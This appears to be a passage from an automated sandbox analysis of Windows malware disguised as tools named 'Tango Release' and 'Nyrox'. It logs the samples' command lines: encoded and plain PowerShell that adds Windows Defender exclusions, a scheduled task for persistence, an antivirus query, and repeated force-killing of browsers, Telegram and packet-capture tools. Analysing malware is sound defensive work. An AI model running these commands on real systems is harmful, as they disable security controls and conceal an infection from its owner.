PID 4960 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4960 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 4864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 928 wrote to memory of 4864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2436 wrote to memory of 3100 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2436 wrote to memory of 3100 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1972 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe

"C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbgBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAeQBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBuAGUAeAB1AHMAbABvAGEAZABlAHIAOgAgAFIAdQBuACAAQQBzACAAQQBkAG0AaQBuACAASQBmACAASQBuAGoAZQBjAHQAaQBvAG4AIABGAGEAaQBsAHMAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHkAbABiACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAcwBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAcQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcAB5ACMAPgA="

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE

"C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE"

C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE

"C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE"

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM vivaldi.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\jlesyw.exe

"C:\Users\Admin\AppData\Local\Temp\jlesyw.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\jlesyw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe" "--multiprocessing-fork" "parent_pid=916" "pipe_handle=848"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath C:\path\to\exclude"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

